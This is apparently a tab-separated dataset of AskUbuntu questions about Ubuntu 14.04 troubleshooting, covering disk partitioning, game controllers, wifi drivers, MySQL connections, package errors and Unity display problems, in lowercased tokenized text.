493865	how do i manually partition my hard drive correctly ?	i 'm trying to install ubuntu 14.04 on my desktop i built . i am not an advanced user by any means so i just want to do the simple installation of `` install ubuntu alongside windows '' but when i do i get the error `` partition length of 5599212891 sectors exceeds the msdos-partition-table-imposed maximum of 4294967295 '' which i 've looked around and it 's the size is the problem so i then went to the option of `` something else '' and i 'm not knowledgeable enough as to what types of partitions to make and how large to make them or anything . i 'm looking for some help because i really want to have my desktop have both windows and ubuntu .
493867	how can i install ansys , nastran or any designing software ?	i install all design software in windows . but i do n't know how to install any designing software in ubuntu . will all these software will work in ubuntu ?
493874	why do n't my xbox & ps3 controllers work in 14.04 ?	since i got a new computer and installed ubuntu 14.04 ( gnome edition ) my ps3 & xbox 360 controllers do n't work anymore . i used to be able to use my ps3 controller in 12.04 using xboxdrv . xbox 360 controller : if i push one of the trigger buttons on the xbox 360 controller my mouse goes haywire . the mouse gets pushed to the left or right of the screen . the mouse also goes crazy if i do n't hit a trigger button , but use the controller for about 1 min . i am using xboxdrv . i run : sudo rmmod xpad sudo xboxdrv -- detach-kernel-driver -- mimic-xpad –silent the problem is the same with and without the “ -- mimix-xpad” option . ps3 controller : if i run xboxdrv with the ps3 controller ( worked in 12.04 ) , the system does n't recognize any buttons i push . there is a known bug in the kernel that ubuntu 14.04 runs : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1326725 users claim this was fixed in the 3.14 kernel . so i upgraded to the 3.14 kernel from ubuntu mainline ( which i do n't like to do ) , but the result is still the same . i would really love some help . i have a fancy new linux gaming machine and ca n't play my games . i even bought the xbox 360 controller because the ps3 one stopped working . but that does n't even work : (
493878	why does menu transparency mess up my notification area ?	i used unity tweak tool to set the menu to be transparent but now my notification area gets all confused after it changes : as you can see it looks like it 's not clearing earlier images from the notification area . i can still see my battery charging behind everything , but it finished charging an hour or so ago . also , sometimes after variety changes my wallpaper the old wallpaper is still visible underneath the menu . logging out and in again refreshes it and fixes the problem . anyone know how i can sort this out ?
493879	how to make `` record my desktop '' capture only one monitor ?	i 've been using record my desktop for a while but a `` problem '' shows up . today i have two monitors . one monitor extend another , but rmd when is capturing my desktop , records the entire desktop which means the capture of both monitors . is there a way to record only one monitor with record my desktop ? if this is not possible , what software can i use to capture only one monitor ( desktop ) , main one for example ? just for comparison , on windows there is a software called open broadcaster software ( obs ) wich have the options to separate the capture . i know they are working on a multiplatform software ( obs studio ) . but for now , it 's not avaliable .
493880	boot-repair : `` you have to give the partition where efi files are located . ''	i 'm using the 64 bit iso of boot-repair to deal with uefi . i followed boot repair asking for 64 bit iso - what do i do with it ? and i was able to do almost everything in it . i 'm stumped at this point : you have to give the partition where efi files are located . when i go to advanced options , i see nothing resembling those instructions . assuming that i 'm just doing it wrong , could someone please walk me through that particular subset of instructions ?
493887	error : can not find backlight controller for radeon acpi graphics card	i get the following message every time i reboot ubuntu 14.04 lts : drm : radeon_acpi_init error : can not find a backlight controller what does this mean , and how can i fix it ? many thanks for your attention !
493888	how can i configure network manager ( via command line ) to only ever connect to a wireless network with a particular ssid ?	i 'm away from work for the week and need to ssh into my office computer ( ubuntu 12.04 ) regularly to do work . unfortunately , my particularly flaky wifi usb dongle on my work computer disconnects once every five or six hours and automatically reconnects to the wrong wireless network . this means i have to keep calling my coworkers and asking them to fix my network , which they ca n't do if it breaks after 6 or 7 pm . how can i configure network manager ( via command line ) to only ever connect to a wireless network with a particular ssid ? i 've found plenty of solutions with a gui , but running ssh -x fails on my personal computer ( a windows machine ) .
494890	synaptic stuck - showing a dpkg error	i was installing dropbox when , for some reason , the process got stuck . synaptic ( and apt-get ) stopped working after that . i tried some hacks i found on the net and ended up deleting /var/lib/dpkg/lock . this only worsened my troubles . running dpkg -- configure -a gives me the error - dpkg : error : dpkg status database is locked by another process please help me out . note - i am a nube . also , this is the first time i am posting a question on askubuntu , so apologies for any mistakes i may be making in posting this question . edit - running synaptic gives me - e : could not open file /var/cache/apt/pkgcache.bin - open ( 2 : no such file or directory ) e : _cache- > open ( ) failed , please report .
495889	how to disable the feature of automatic system shutdown in 60 seconds ?	after pressing the physical power button on computer it 's shown a 60 second countdown dialogue box : '' this system will be automatically shutdown in 60 seconds '' how can i disable this feature ? the system is : ubuntu 14.04 , 64 bit . in the background : my little kid tends to press any keys just passing by the laptop , sometimes it 's a power button , so the system goes into a shutdown in one minute although it is working and doing something like file downloading . it would be comfortable to be able to adjust the timeout value or just to enable/disable the thing in order to have the same dialogue without countdown timer but awaiting for the reaction from user on the appeared options : thanks for any help .
495892	14.04 my keyboard mapping is incorrect . how can i fix it ?	i installed 14.04 from dvd and did no customization . mouse works fine , but the keyboard is very messed up . num lock stays on and wo n't go off . some keys work , other do not . so jlk works but asd do not . fails in browser , terminal , and sublime . all worked fine under 12.0 . i tried gear menu > system settings > keyboard , but this has only shortcuts and typing . i ca n't type dconf-editor as some have suggested , d key does not work .
495893	how to get unity environment in gnome	i do n't want to remove gnome shell but at the same time i want to unity desktop also can i get it done in my pc with pre-installed gnome 3 .
495894	no wireless connection on new install	okay guys . i know that these problems can get super specific and i 've looked around at questions with similar problems and i 'm just not finding it . i am brand spanking new to linux . keep that in mind . i have a dual boot macbook pro that i just got done with yesterday . at first , the wireless connection was fine , but today i started having problems . i know it 's not a hardware issue with the laptop itself as i am typing this and asking this using os x right now . anywho , the trouble is that whenever i boot ubuntu ( 14.04 ) , the wireless connection works for probably five or ten minutes . it gets super slow . and then it dies all together . the icon indicator for the wireless connection still says that i 'm connected this whole time , but nothing loads and i 'm at a loss . help ? thanks in advance .
495895	problems cause after an update to ubuntu 14.04	i updated ubuntu 14.04 , after that had a lot of problems . for example , the mouse moves slowly the sound does not work it can not connect to the internet the motherboard leds blink all the time is there any way that i repair it ? edit1 : when i try to open xdiagnose , nothing comes up . i opened software updater , it shows an error , and says one of the reasons could be `` update did not finish completely . '' edit2 : i used `` sudo dpkg -- configure -a '' . it solved at least most of the problems , but says dpkg : error processing package linux-libc-dev : amd64 ( -- configure ) : package is in a very bad inconsistent state ; you should reinstall it brefore attemping to configure it . i entered `` sudo apt-get remove linux-libc-dev : amd64 '' it removed some of the package and said : dpkg : error processing package linux-libc-dev : amd64 ( -- remove ) : package is in a very bad inconsistent state ; you should reinstall it brefore attemping a removal how can i reinstall it ?
495897	need some help building wifi drivers	i have never compiled a driver before so i 'm trying to figure out how to do this . i 'm on kernel 3.14.1 by the way . i 'm trying to build ralink rt3573 drivers from github . i 'm getting errors when i do sudo make . the build instructions are confusing . can someone take me through them ? here 's the github link : https : //github.com/ashaffer/rt3573sta build instructions : ==================== 1 > $ tar -xvzf dpb_rt2870_linux_sta_x.x.x.x.tgz go to `` ./dpb_rt2870_linux_sta_x.x.x.x '' directory . 2 > in makefile set the `` mode = sta '' in makefile and chose the target to linux by set `` target = linux '' define the linux kernel source include file path linux_src modify to meet your need . 3 > in os/linux/config.mk define the gcc and ld of the target machine define the compiler flags cflags modify to meet your need . ** build for being controlled by networkmanager or wpa_supplicant wext functions please set 'has_wpa_supplicant=y ' and 'has_native_wpa_supplicant_support=y ' . = > # > cd wpa_supplicant-x.x = > # > ./wpa_supplicant -dwext -ira0 -c wpa_supplicant.conf -d ** build for being controlled by wpasupplicant with ralink driver please set 'has_wpa_supplicant=y ' and 'has_native_wpa_supplicant_support=n ' . = > # > cd wpa_supplicant-0.5.7 = > # > ./wpa_supplicant -dralink -ira0 -c wpa_supplicant.conf -d 4 > $ make # compile driver source code # to fix `` error : too few arguments to function ¡¥iwe_stream_add_event '' = > $ patch -i os/linux/sta_ioctl.c.patch os/linux/sta_ioctl.c 5 > $ cp rt2870sta.dat /etc/wireless/rt2870sta/rt2870sta.dat 6 > load driver , go to `` os/linux/ '' directory . # [ kernel 2.4 ] # $ /sbin/insmod rt2870sta.o # $ /sbin/ifconfig ra0 inet your_ip up # [ kernel 2.6 ] # $ /sbin/insmod rt2870sta.ko # $ /sbin/ifconfig ra0 inet your_ip up 7 > unload driver $ /sbin/ifconfig ra0 down $ /sbin/rmmod rt2870sta
495898	problem to copy a file from hdfs to local system [ copytolocal : permission denied ]	i have installed and executed an mapreduce program successfully in my system ( ubuntu 14.04 ) . i can see the output file as , hadoopuser @ arul-pc : /usr/local/hadoop $ bin/hadoop dfs -ls /user/hadoopuser/mapreducesample-output found 3 items -rw-r -- r -- 1 hadoopuser supergroup 0 2014-07-09 16:10 /user/hadoopuser/mapreducesample-output/_success drwxr-xr-x - hadoopuser supergroup 0 2014-07-09 16:10 /user/hadoopuser/mapreducesample-output/_logs -rw-r -- r -- 1 hadoopuser supergroup 880838 2014-07-09 16:10 /user/hadoopuser/mapreducesample-output/part-00000 and i can open it on terminal using following command , hadoopuser @ arul-pc : /usr/local/hadoop $ bin/hadoop dfs -cat /user/hadoopuser/mapreducesample-output/part-00000 i can see the output file on terminal , but i ca n't see the full result because my output has large amount of lines . updation i have tried to copy the output file into local machine , hadoopuser @ avvenire-pc : /usr/local/hadoop $ bin/hadoop dfs -copytolocal /user/hadoopuser/mapreducesample-output/part-00000 /home/arul/downloads/sampledatahadoop i got response as , copytolocal : permission denied expecting solution .
495899	hddtemp and smartctl with usb to sata external hdd	i can use hddtemp to read temperture various usb hdd 's using hddtemp sata : /dev/sdx and as well smartctl ( gsmartcontrol as well ) does work when i use `` -d sat '' option . can i somehow make this a default for hddtemp , or override somethig in settings permanently ? i would like to see temperature in xfce4-sensors-plugin , or , at least , by simple wildcard in /dev/sd ? i do not use other than sata hdd 's ? ( and it seems making no problem if called with standard usb flash key which does tell nothing either ) . i sometimes change drives and would have to manually change commands to let them work if usb drive moves elsewhere.. but the most wanted is xfce4 plugin to see them all . hddtemp /dev/sd ? does work perfect but onlty with real sata ports , tells : drive does not support smart for each usb . hddtemp sata : /dev/sd ? does not like the command syntax . perhaps i am noob and do not know how to use command line ? hddtemp /dev/sd [ a-c ] sata : /dev/sdd -it does work perfect .
495900	one column from output column on awk	suppose which i have this table : one two three four two three four five three four five six four five six seven five six seven eight so i wrote awk -v word=two ' $ 0 ~ `` [ ^ [ : alpha : ] ] '' word `` [ ^ [ : alpha : ] ] '' 'from this link to access all lines which have two . and the result is whole of line : one two three four two three four five if i want to find just $ 3 . what i should add for that command ? if i want to search on the internet to find the answer . what do i should search ? or better to say this easy : ( question refer to which topic of awk ?
495901	need to run xscreensaver in one of the two monitors in a multihead setup - ubuntu 12.04	i have a multihead setup with two monitors , running ubuntu 12.04 . how to make xscreensaver run in one monitor . need only one of the following lines present , on invoking xscreensaver . xscreensaver : 10:25:41 : already running on display :0.0 ( window 0x1c00001 ) from process 3528 ( user @ user-desktop ) . xscreensaver : 10:25:41 : already running on display :0.0 ( window 0x1c00005 ) from process 3528 ( user @ user-desktop ) . setting the environment variable xscreensaver_window may solve it , but how to get the window-id ? please help
495903	why iptables has pre-up and post-down rules	why the iptables has post-down rule and pre-up rule ? is it necessary to have 2 rules instead of just one pre-up rule ? https : //help.ubuntu.com/community/iptableshowto auto eth0 iface eth0 inet dhcp pre-up iptables-restore < /etc/iptables.rules post-down iptables-restore < /etc/iptables.downrules
495904	update failed , what to do ?	failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/l/linux-lts-quantal/linux-image-3.5.0-52-generic_3.5.0-52.78~precise1_amd64.deb could not resolve 'security.ubuntu.com' failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/l/linux-lts-quantal/linux-headers-3.5.0-52_3.5.0-52.78~precise1_all.deb could not resolve 'security.ubuntu.com' how to fix this issue ?
495908	making pc on mobile internet accessible from public network	i have a pc which is connected to internet through a d-link 3g dongle . how can i make my machine 's ip public so that i can access it through ssh from other networks ?
495912	how to fix unity problems after upgrading to ubuntu 14.04 ?	after upgrading to ubuntu 14.04 , i am having trouble with my display . i tried the following to fix ... dconf reset -f /org/compiz/ setsid unity ... but on doing the setsid unity , i get the following errors . kindly advise . rahul @ rahul-latitude-e6430 : ~ $ setsid unity rahul @ rahul-latitude-e6430 : ~ $ unity-panel-service stop/waiting compiz ( core ) - info : loading plugin : core compiz ( core ) - info : starting plugin : core unity-panel-service start/running , process 3054 compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - info : loading plugin : opengl compiz ( core ) - info : unity is fully supported by your hardware . compiz ( core ) - info : unity is fully supported by your hardware . compiz ( core ) - info : starting plugin : opengl compiz ( core ) - info : loading plugin : copytex compiz ( core ) - info : starting plugin : copytex compiz ( core ) - info : loading plugin : grid compiz ( core ) - info : starting plugin : grid compiz ( core ) - info : loading plugin : imgpng compiz ( core ) - info : starting plugin : imgpng compiz ( core ) - info : loading plugin : resize compiz ( core ) - info : starting plugin : resize compiz ( core ) - info : loading plugin : place compiz ( core ) - info : starting plugin : place compiz ( core ) - info : loading plugin : move compiz ( core ) - info : starting plugin : move compiz ( core ) - info : loading plugin : snap compiz ( core ) - info : starting plugin : snap compiz ( core ) - info : loading plugin : regex compiz ( core ) - info : starting plugin : regex compiz ( core ) - info : loading plugin : mousepoll compiz ( core ) - info : starting plugin : mousepoll compiz ( core ) - info : loading plugin : session compiz ( core ) - info : starting plugin : session compiz ( core ) - info : loading plugin : commands compiz ( core ) - info : starting plugin : commands compiz ( core ) - info : loading plugin : unitymtgrabhandles compiz ( core ) - info : starting plugin : unitymtgrabhandles compiz ( core ) - info : loading plugin : wall compiz ( core ) - info : starting plugin : wall compiz ( core ) - info : loading plugin : compiztoolbox compiz ( core ) - info : starting plugin : compiztoolbox compiz ( core ) - info : loading plugin : vpswitch compiz ( core ) - info : starting plugin : vpswitch compiz ( core ) - info : loading plugin : animation compiz ( core ) - info : starting plugin : animation compiz ( core ) - info : loading plugin : expo compiz ( core ) - info : starting plugin : expo compiz ( core ) - info : loading plugin : ezoom compiz ( core ) - info : starting plugin : ezoom compiz ( core ) - info : loading plugin : fade compiz ( core ) - info : starting plugin : fade compiz ( core ) - info : loading plugin : workarounds compiz ( core ) - info : starting plugin : workarounds compiz ( core ) - info : loading plugin : scale compiz ( core ) - info : starting plugin : scale compiz ( core ) - info : loading plugin : unityshell compiz ( core ) - info : starting plugin : unityshell warn 2014-07-10 11:46:38 unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'org.gnome.shell ' yet as we do n't have a connection , waiting for it ... error 2014-07-10 11:46:38 unity.debug.interface debugdbusinterface.cpp:216 unable to load entry point in libxpathselect : libxpathselect.so.1.4 : can not open shared object file : no such file or directory warn 2014-07-10 11:46:38 xim.controller ximcontroller.cpp:103 ibus natively supported . warn 2014-07-10 11:46:38 unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'com.canonical.unity.launcher ' yet as we do n't have a connection , waiting for it ... warn 2014-07-10 11:46:38 unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'com.canonical.unity.dash ' yet as we do n't have a connection , waiting for it ... warn 2014-07-10 11:46:38 unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'org.gnome.sessionmanager.endsessiondialog ' yet as we do n't have a connection , waiting for it ... warn 2014-07-10 11:46:38 unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'com.canonical.unity.session ' yet as we do n't have a connection , waiting for it ... warn 2014-07-10 11:46:38 unity.glib.dbus.server glibdbusserver.cpp:579 ca n't register object 'org.gnome.screensaver ' yet as we do n't have a connection , waiting for it ... error 2014-07-10 11:46:38 unity.glib.dbus.server glibdbusserver.cpp:524 dbus name lost 'org.gnome.shell' error 2014-07-10 11:46:38 unity.glib.dbus.server glibdbusserver.cpp:524 dbus name lost 'com.canonical.unity' i also tried to reinstall ... sudo apt-get install -- reinstall ubuntu-desktop sudo apt-get install -- reinstall unity ... but no luck . also , running the `` unity -- reset-icons '' throws a whole bunch of errors.. error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'minimize' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'minimize_focused_prelight' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'minimize_focused_pressed' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'minimize_unfocused' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'minimize_unfocused' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'minimize_unfocused_prelight' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'minimize_unfocused_pressed' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'unmaximize' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'unmaximize_focused_prelight' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'unmaximize_focused_pressed' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'unmaximize_unfocused' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'unmaximize_unfocused' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'unmaximize_unfocused_prelight' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'unmaximize_unfocused_pressed' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'maximize' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'maximize_focused_prelight' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'maximize_focused_pressed' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'maximize_unfocused' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'maximize_unfocused' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'maximize_unfocused_prelight' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'maximize_unfocused_pressed' error 2014-07-10 14:07:50 unity_is_valid ( res , icon ) :0 gdk_pixbuf_new_from_file_at_scale : assertion 'width > 0 || width == -1 ' failed error 2014-07-10 14:07:50 nux.gltexture.resource.manager gltextureresourcemanager.cpp:54 invalid target , impossible to generate a new texture . null pixbuf error 2014-07-10 14:07:50 unityding- > source ! = null :0 g_object_unref : assertion 'g_is_object ( object ) ' failed warn 2014-07-10 14:07:50 unity.decoration.style decorationstyle.cpp:443 no window button file for 'close' any help is appreciated . rahul @ rahul-latitude-e6430 : ~ $ /usr/lib/nux/unity_support_test -p opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) ivybridge mobile x86/mmx/sse2 opengl version string : 3.0 mesa 10.1.3 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes my video card is : lspci -v | less 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device 0534 flags : bus master , fast devsel , latency 0 , irq 43 memory at f6400000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at f000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915
495915	could not connect : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 )	i am new to ubuntu and using ubuntu server 14.40 lts . i am trying to connect my mysql database to show database data on a php file but i am not able to connect it . i am getting error could not connect : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) when i open that php file and when i open my phpmyadmin then i got # 2002 can not log in to the mysql server and connection for controluser as defined in your configuration failed . just after installing ubuntu , i opened my php page outside from server and then was not able to connect the database or even not getting any error . then searching over google , i changed bind-address = 127.0.0.1 to # bind-address = 127.0.0.1 to allow connection in /etc/mysql/my.cnf but after this i got the above two error . my connection file is below ... < ? php $ host = `` localhost '' ; $ username = `` my_username '' ; $ password = `` my_password '' ; $ dbname = `` my_database '' ; $ connection = mysql_connect ( $ host , $ username , $ password ) ; if ( ! $ connection ) { die ( 'could not connect : ' . mysql_error ( ) ) ; } mysql_select_db ( $ dbname ) or die ( mysql_error ( ) ) ; mysql_query ( `` set names utf8 '' ) ; ? > in addition , my port 80 is blocked my isp and i am using port 7550 for apache . i also have a dynamic ip . please consider these limitation and tell me how to connect to mysql server ? please answer using terminal .
495916	update failed what to do ?	failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/l/linux-lts-quantal/linux-headers-3.5.0-52-generic_3.5.0-52.78~precise1_amd64.deb could not resolve 'security.ubuntu.com' failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_3.2.0-65.98_amd64.deb could not resolve 'security.ubuntu.com' what to do ?
495918	how to reinstall linux-libc-dev : amd64	i used `` sudo dpkg -- configure -a '' to repair an uncomplete update . it solved at least most of the problems , but says dpkg : error processing package linux-libc-dev : amd64 ( -- configure ) : package is in a very bad inconsistent state ; you should reinstall it brefore attemping to configure it . i entered `` sudo apt-get remove linux-libc-dev : amd64 '' it removed some parts of the package and said : dpkg : error processing package linux-libc-dev : amd64 ( -- remove ) : package is in a very bad inconsistent state ; you should reinstall it brefore attemping a removal how can i reinstall it ?
